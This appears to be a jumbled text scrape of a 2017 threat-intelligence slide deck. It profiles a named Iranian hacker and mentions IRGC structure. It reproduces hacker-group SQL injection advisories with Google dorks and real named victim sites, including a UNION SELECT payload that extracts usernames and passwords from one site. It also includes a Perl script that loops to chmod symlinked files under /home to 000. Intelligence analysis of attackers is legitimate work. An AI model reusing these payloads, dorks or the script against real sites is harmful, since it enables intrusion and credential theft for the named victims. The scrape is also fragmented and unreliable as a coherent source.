born: june 6, 1985 worked at: tci (persian: is the fixed-line it was ... · # exploit title :...

15
Copyright 2017 Treadstone71 LLC Behzad Masri - skote_zahshat Born: June 6, 1985 Worked at: Telecommunication Company of Iran, or TCI (Persian: ﺷرﮐت ﻣﺧﺎﺑرات اﯾران( is the fixed-line incumbent operator in Iran offering services in fixed telephony, DSL and data services for both residential and business customers, all throughout the country. It was established in 1971 with a new organizational structure as the … Fan of Ubuntu and Firefox – hobbies: hacking

Upload: others

Post on 18-Jan-2020

2 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

Behzad Masri - skote_zahshatBorn: June 6, 1985Worked at:Telecommunication Company of Iran, or TCI (Persian: شرکت مخابرات ایران ( is the fixed-line incumbent operator in Iran offering services in fixed telephony, DSL and data services for both residential and business customers, all throughout the country. It was established in 1971 with a new organizational structure as the …Fan of Ubuntu and Firefox – hobbies: hacking

Page 2: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

Page 3: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

Page 4: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

Page 5: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

# http://www.yunakdh.gov.tr/download.php?src=download.php# http://www.lapsekidevlethastanesi.gov.tr/download.php?src=index.php# http://www.kirklarelikhb.gov.tr/download.php?src=setup.php# http://www.beysehirdh.gov.tr/download.php?src=setup.php# http://www.bkhb.gov.tr/download.php?src=setup.php

RaidCall - 100_ БЕСПЛАТНАЯ программа для

Page 6: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

http://dl.jozveha.com/Download/jozavat-bartar-computer/ password on some – ashiyane.org

######################################################################################## # # Exploit Title : upperlinkltd Cms Sql Injection Vulnerabilitiy # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home : http://IrIsT.Ir/forum # # Software Link : http://upperlink.com.ng/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : "powered by Upperlink Ltd" # ######################################################################################## # # Expl0iTs : # # [TarGeT]/pages.php?page_id=[Sql] # # # D3m0: # # http://charlesadebiyi-andco.com/pages.php?page_id=32[Sql] # # http://www.mysmslink.com/pages.php?page_id=2[Sql] # ################################################################################

########################################################################### # # Exploit Title : webdesigns-studio Cms Sql Injection Vulnerabilitiy # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home : http://IrIsT.Ir/forum # # Software Link : http://webdesigns-studio.com/ # # Security Risk : High # # Version : All Version # # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # # Dork : "Site by Webdesigns-studio.com" # ######################################################################################## # # Expl0iTs : # # [TarGeT]/page.php?id=[Sql] # # # D3m0: # # http://homelandmg.com/page.php?id=1[Sql] # # http://www.apsisimport.com/page.php?id=1[Sql] # # http://ringnations.com/page.php?id=1[Sql] # ######################################################################################## #

Page 7: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

IRGC Organization velayat-e faqih

Page 8: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

IRGC – Al-Qods ForceLocations – GroundForces – Structure

Page 9: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC############################################################################# Exploit Title: Php-X-Links Script SQL Injection Vulnerabilitiy# Google Dork: "Powered by Php-X-Links"# Date: 1/1/2012# Author: H4ckCity Security Team# Discovered By: farbodmahini# Home: WwW.H4ckCity.Org # Version: All Version# Category:: webapps# Security Risk:: High# Tested on: GNU/Linux Ubuntu - Windows Server - win7############################################################################# Exploit:### http://www.target.com/links/rate.php?id=[SQLi]# http://www.target.com/links/view.php?cid=[SQLi]# http://www.target.com/links/pop.php?t=[SQLi]#############################################################################

################################################################################??########## Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability## Author : IrIsT.Ir## Discovered By : Am!r## Home : http://IrIsT.Ir/forum## Software Link : http://www.Vbulletin.com/## Security Risk : High## Version : All Version## Tested on : GNU/Linux Ubuntu - Windows Server - win7## Dork : intext:"Powered By Vbulletin 4.1.12"#################################################################################??########## Expl0iTs :## http://target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]#

Page 10: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

Page 11: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC#!/usr/bin/perl#coded by Mikili#Thanks : 2MzRp , Mehdi.H4ckcity ,YabanCi , M.Prince , L0phtIran#W.W.H4ckcity.Orgfor(;;){system("sleep 3s");$mm=localtime();system("find /home/*/pblic_html -type l -exec ls -l {} \ > '$mm'.txt");system("chmod 777 '$mm'.txt");open (LIST,"$mm.txt");@add=<LIST>;$i=1;foreach $file(@add){chomp $file;system("chmod 000 '$file'");$i++;}#print "\n$i file has been chmoded.DONE\n";close(LIST);}

Page 12: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

Page 13: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC

Page 14: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| |* ______ ____ __ __ | |* /\__ _\/\ _`\/\ \/\ \ | |* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } | |* \ \ \ \ \ _ <'\ \ _ \ | |* \ \ \ \ \ \L\ \\ \ \ \ \ | |* \ \_\ \\____/ \ \_\ \_\ | |* \/_/ \/___/ \/_/\/_/ | |* | |* | |=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| ======================================================================= \* [Title] :[Duta Electro, PT sql injection vulnerability] /* \* [Vender] :[http://www.kas.de] /* \* [Author] :[skote_vahshat] /* \* [Home] :[Http://Skote-Vahshat.com] /* \* [Archive] :[Http://xpl.skote-vahshat.com] /* \* [Email] :[[email protected]] /* \* [Date] :[2011/07/09] /* ======================================================================= /* [+]Exploit : /* http://www.target.com/artikel.php?id=[SQLi] /* [+]Demo: /* http://www.dueltec.com/artikel.php?id=-22+union+select+1,2,user_Name,user_Pass,5,6+from+dueltec_user-- /* /* =======================================================================

Page 15: Born: June 6, 1985 Worked at: TCI (Persian: is the fixed-line It was ... · # Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability # # Author : IrIsT.Ir

Copyright 2017 Treadstone71 LLC